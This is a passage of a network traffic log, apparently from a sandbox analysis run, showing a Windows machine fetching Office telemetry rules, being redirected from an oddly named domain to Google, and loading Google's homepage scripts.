2024-11-07 06:33:20 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:20 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 62e0c468-a01e-0084-1b55-2e9ccd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063320Z-15869dbbcc62nmdhhC1DFWg2r400000000yg00000000c37b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:20 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49859	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:20 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:20 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:20 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: a6457f9b-d01e-0014-585c-2eed58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063320Z-15869dbbcc662ldwhC1DFWbd5g000000014g00000000f9cg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:20 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	49860	172.240.127.234	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:20 UTC	714	OUT	GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1 Host: trashycontinuousbubbly.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 06:33:20 UTC	971	IN	HTTP/1.1 302 Found Server: nginx/1.21.6 Date: Thu, 07 Nov 2024 06:33:20 GMT Content-Type: text/html Content-Length: 0 Connection: close P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA Location: https://www.google.com/ Set-Cookie: u_pl23778734=1; expires=Fri, 08 Nov 2024 06:33:20 GMT; path=/ Set-Cookie: backurled=dfdceae1749487fe3ee94c1a351e9103; expires=Thu, 07 Nov 2024 06:34:20 GMT; path=/ Host: trashycontinuousbubbly.com Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Request-ID: 17f232992f79a6ddd92026d0a0a5baf7 Cache-Control: max-age=0, private, no-cache Pragma: no-cache Strict-Transport-Security: max-age=0; includeSubdomains

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	49861	142.250.185.132	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:20 UTC	657	OUT	GET / HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 06:33:20 UTC	1762	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:20 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Bze4bqm-1Zds_gFP1uh-Ww' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AVYB7cq03GfTpx8M4Jd9pdHvRuun79QVjYMaNk1uYO9gKLxoj3evRLcUYw; expires=Tue, 06-May-2025 06:33:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=518=hx4NEOILpI80dBbgrrGm129tv0HDtsaX_FhoqZ-zD6BREcbkIVxvppaPAYGiTpY--TS0F0o3FbdxHHxs3gzlCnHln9xLDu9L6Yk05bBHfAmNa_v5zrN0y8ofjRA7GUq-F-9_Qu3PrY4ACol0CWWW1Ok71RVqJ2q-ICtiEzq5KefXSrYUsjB3kxK6IvCRB1N5Zn4; expires=Fri, 09-May-2025 06:33:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 06:33:20 UTC	1762	IN	Data Raw: 32 37 39 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 3e 3c 74 69 74 6c 65 3e Data Ascii: 2797<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>
2024-11-07 06:33:20 UTC	1762	IN	Data Raw: 2c 65 2c 64 2c 6b 29 29 3b 69 66 28 63 3d 72 28 63 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 67 3d 6e 2e 6c 65 6e 67 74 68 3b 6e 5b 67 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b 67 5d 7d 3b 61 2e 73 72 63 3d 63 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6c 3a 62 3b 72 65 74 75 72 6e 20 74 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 79 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 79 3d 5b 5d 3b 76 61 72 20 64 3b 28 64 3d 67 6f 6f 67 6c 65 29 2e 78 7c 7c 28 64 2e 78 Data Ascii: ,e,d,k));if(c=r(c)){a=new Image;var g=n.length;n[g]=a;a.onerror=a.onload=a.onabort=function(){delete n[g]};a.src=c}};google.logUrl=function(a,b){b=b===void 0?l:b;return t("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x\|\|(d.x
2024-11-07 06:33:20 UTC	1762	IN	Data Raw: 69 6e 67 26 26 22 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 22 69 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2c 61 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 6e 73 2c 74 3d 72 3f 61 61 7c 7c 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3a 76 6f 69 64 20 30 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2d 28 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 2e 70 6e 6f 7c 7c 30 29 7d 76 61 72 20 62 61 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 26 26 67 6f 6f 67 6c 65 2e 73 74 76 73 63 Data Ascii: ing&&"navigationStart"in window.performance.timing,aa=google.stvsc&&google.stvsc.ns,t=r?aa\|\|window.performance.timing.navigationStart:void 0;function u(){return window.performance.now()-(google.stvsc&&google.stvsc.pno\|\|0)}var ba=google.stvsc&&google.stvsc
2024-11-07 06:33:20 UTC	1762	IN	Data Raw: 3f 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 62 2c 63 2c 64 7c 7c 21 31 29 3a 61 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 61 2e 64 65 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 62 2c 63 29 7d 3b 76 61 72 20 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 67 3d 61 3b 74 68 69 73 2e 76 3d 5b 5d 3b 74 68 69 73 2e 42 3d 74 68 69 73 2e 67 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 61 66 74 22 29 3b 74 68 69 73 2e 6a 3d 21 21 74 68 69 73 2e 67 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 64 65 66 65 72 72 65 64 22 29 3b 76 61 72 20 64 3b 69 66 28 64 3d 21 74 68 69 73 2e 6a 29 61 3a 7b 66 6f 72 28 64 3d 30 3b 64 3c 44 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 69 66 28 61 2e 67 65 Data Ascii: ?a.removeEventListener(b,c,d\|\|!1):a.attachEvent&&a.detachEvent("on"+b,c)};var pa=function(a,b,c){this.g=a;this.v=[];this.B=this.g.hasAttribute("data-noaft");this.j=!!this.g.getAttribute("data-deferred");var d;if(d=!this.j)a:{for(d=0;d<D.length;++d)if(a.ge
2024-11-07 06:33:20 UTC	1762	IN	Data Raw: 28 22 69 6d 67 22 29 2c 63 3d 30 2c 64 3d 62 2e 6c 65 6e 67 74 68 3b 63 3c 64 3b 2b 2b 63 29 61 28 49 28 62 5b 63 5d 29 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 61 28 61 29 7b 69 66 28 61 26 26 28 61 3d 61 2e 74 61 72 67 65 74 2c 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 49 4d 47 22 29 29 7b 76 61 72 20 62 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 47 28 49 28 61 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2c 62 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 61 29 7b 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 28 61 29 7d 3b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 3d 7b 7d 3b 67 6f 6f 67 6c 65 2e 73 74 61 72 74 54 69 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 74 69 6d 65 72 73 5b 61 5d 3d 7b 74 3a 7b 73 74 61 72 74 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 2c 65 3a Data Ascii: ("img"),c=0,d=b.length;c<d;++c)a(I(b[c]))};function ra(a){if(a&&(a=a.target,a.tagName==="IMG")){var b=Date.now();G(I(a,void 0,!0,!0),b)}}function K(a){google.c.oil(a)};google.timers={};google.startTick=function(a){google.timers[a]={t:{start:Date.now()},e:
2024-11-07 06:33:20 UTC	1333	IN	Data Raw: 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 51 2c 21 30 29 3b 50 28 30 29 3b 78 26 26 28 67 6f 6f 67 6c 65 2e 63 2e 6f 69 6c 3d 72 61 2c 42 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 6c 6f 61 64 22 2c 4b 2c 21 30 29 2c 42 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 22 65 72 72 6f 72 22 2c 4b 2c 21 30 29 29 3b 67 6f 6f 67 6c 65 2e 63 76 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 69 66 28 21 61 7c 7c 21 62 26 26 64 61 28 61 29 29 72 65 74 75 72 6e 20 30 3b 69 66 28 21 61 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 29 72 65 74 75 72 6e 20 31 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 67 65 74 42 6f 75 6e 64 Data Ascii: sibilitychange",Q,!0);P(0);x&&(google.c.oil=ra,B(document.documentElement,"load",K,!0),B(document.documentElement,"error",K,!0));google.cv=function(a,b,c,d){if(!a\|\|!b&&da(a))return 0;if(!a.getBoundingClientRect)return 1;var e=function(h){return h.getBound
2024-11-07 06:33:20 UTC	328	IN	Data Raw: 31 34 31 0d 0a 3d 22 22 2b 64 2b 66 2b 22 2e 22 2b 63 5b 66 5d 2c 64 3d 22 2c 22 3b 66 6f 72 28 76 61 72 20 67 20 69 6e 20 62 29 61 2b 3d 22 26 22 2b 67 2b 22 3d 22 2b 62 5b 67 5d 3b 66 3d 61 3b 67 3d 22 22 3b 61 3d 5b 5d 3b 70 2e 5f 63 73 68 69 64 26 26 0a 61 2e 70 75 73 68 28 5b 22 63 73 68 69 64 22 2c 70 2e 5f 63 73 68 69 64 5d 29 3b 62 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 21 3d 3d 76 6f 69 64 20 30 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 21 3d 3d 76 6f 69 64 20 30 26 26 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 21 3d 3d 30 3f 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 6b 4f 50 49 3a 6e 75 6c 6c 3b 62 21 3d 6e 75 6c 6c 26 26 61 2e 70 75 73 68 28 5b 22 6f 70 69 22 2c 62 2e 74 6f 53 74 72 69 6e 67 28 29 5d 29 3b 66 6f Data Ascii: 141=""+d+f+"."+c[f],d=",";for(var g in b)a+="&"+g+"="+b[g];f=a;g="";a=[];p._cshid&&a.push(["cshid",p._cshid]);b=window.google!==void 0&&window.google.kOPI!==void 0&&window.google.kOPI!==0?window.google.kOPI:null;b!=null&&a.push(["opi",b.toString()]);fo
2024-11-07 06:33:21 UTC	1378	IN	Data Raw: 38 30 30 30 0d 0a 3b 28 66 3d 67 6f 6f 67 6c 65 2e 73 74 76 73 63 29 26 26 28 61 2b 3d 22 26 73 73 72 3d 31 22 29 3b 69 66 28 66 3f 66 2e 69 73 42 46 3a 53 28 29 3d 3d 3d 32 29 61 2b 3d 22 26 62 62 3d 31 22 3b 53 28 29 3d 3d 3d 31 26 26 28 61 2b 3d 22 26 72 3d 31 22 29 3b 22 67 73 61 73 72 74 22 69 6e 20 63 26 26 28 63 3d 54 28 22 71 73 64 22 29 2c 63 3e 30 26 26 28 61 2b 3d 22 26 71 73 64 3d 22 2b 63 29 29 3b 61 3a 7b 69 66 28 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 26 26 28 63 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 28 22 6e 61 76 69 67 61 74 69 6f 6e 22 29 2c 63 Data Ascii: 8000;(f=google.stvsc)&&(a+="&ssr=1");if(f?f.isBF:S()===2)a+="&bb=1";S()===1&&(a+="&r=1");"gsasrt"in c&&(c=T("qsd"),c>0&&(a+="&qsd="+c));a:{if(window.performance&&window.performance.getEntriesByType&&(c=window.performance.getEntriesByType("navigation"),c
2024-11-07 06:33:21 UTC	1378	IN	Data Raw: 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 29 3a 2d 31 3b 76 61 72 20 65 3d 6d 61 26 26 21 63 3f 21 31 3a 62 3e 3d 63 3b 59 7c 7c 21 64 26 26 21 65 7c 7c 28 59 3d 61 2c 58 3d 62 29 3b 69 66 28 59 29 7b 76 61 72 20 68 3d 30 2c 6b 3d 30 2c 6d 3d 30 2c 6e 3d 21 31 3b 78 61 28 66 75 6e 63 74 69 6f 6e 28 66 29 7b 69 66 28 21 28 46 28 66 29 26 31 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 66 2e 41 29 72 65 74 75 72 6e 2b 2b 6d 2c 21 66 2e 42 3b 46 28 66 29 26 34 26 26 28 6e 3d 21 30 29 3b 66 2e 6a 26 26 2b 2b 6b 3b 2b 2b 68 3b 72 65 74 75 72 6e 21 30 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 41 28 22 69 6d 61 22 2c 68 29 3b 41 28 22 69 6d 61 64 22 2c 6b 29 3b 41 28 22 69 6d 61 63 22 2c 6d 29 3b 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 Data Ascii: dow.pageYOffset):-1;var e=ma&&!c?!1:b>=c;Y\|\|!d&&!e\|\|(Y=a,X=b);if(Y){var h=0,k=0,m=0,n=!1;xa(function(f){if(!(F(f)&1))return!1;if(f.A)return++m,!f.B;F(f)&4&&(n=!0);f.j&&++k;++h;return!0},function(){A("ima",h);A("imad",k);A("imac",m);(document.getElementsBy
2024-11-07 06:33:21 UTC	1378	IN	Data Raw: 65 74 75 70 3d 43 61 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 67 6f 6f 67 6c 65 2e 64 72 63 2e 73 68 69 66 74 28 29 3b 61 3b 29 61 28 29 2c 61 3d 67 6f 6f 67 6c 65 2e 64 72 63 2e 73 68 69 66 74 28 29 7d 3b 67 6f 6f 67 6c 65 2e 64 72 63 3d 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c 65 2e 74 69 63 6b 26 26 67 6f 6f 67 6c 65 2e 74 69 63 6b 28 22 6c 6f 61 64 22 2c 22 64 63 6c 22 29 7d 5d 3b 67 6f 6f 67 6c 65 2e 64 63 6c 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 6f 6f 67 6c 65 2e 64 72 63 2e 6c 65 6e 67 74 68 3f 67 6f 6f 67 6c 65 2e 64 72 63 2e 70 75 73 68 28 61 29 3a 61 28 29 7d 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 Data Ascii: etup=Ca;}).call(this);(function(){function b(){for(var a=google.drc.shift();a;)a(),a=google.drc.shift()};google.drc=[function(){google.tick&&google.tick("load","dcl")}];google.dclc=function(a){google.drc.length?google.drc.push(a):a()};window.addEventListe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	49862	142.250.185.132	443	1396	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:20 UTC	1678	OUT	GET /xjs/_/ss/k=xjs.hd.URsTCE79FvA.L.B1.O/am=JFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAwAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/d=1/ed=1/br=1/rs=ACT90oH8F5TBlHJCEu7ijntWqevhy0CRoA/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,d,csi HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCIOFeQGZIyfLK3Q7dXdZISvHKCvV384m7j8oE2kpRPhOEVaS6gZo; NID=518=QZl9tNBxYnBCjVh9mcDFDMAGPTlPMMuZzjMwkr6yCzn54HQW-XHnsTrtYE7_QeIvOrB8wulYd7DpfvQcKY8a5SdNackSZ8tG6gE-SwJvS7xYzw5B8UpYzVQzqUWyex6rltqDXiQzUFXDdvD5mrp5T6JDO0xYsqbaJFbAZ8-NOntOVxyMIwMghSUTHSCQFRqzyxmK
2024-11-07 06:33:21 UTC	809	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/css; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 4232 Date: Thu, 07 Nov 2024 06:33:20 GMT Expires: Fri, 07 Nov 2025 06:33:20 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 07 Nov 2024 00:23:26 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
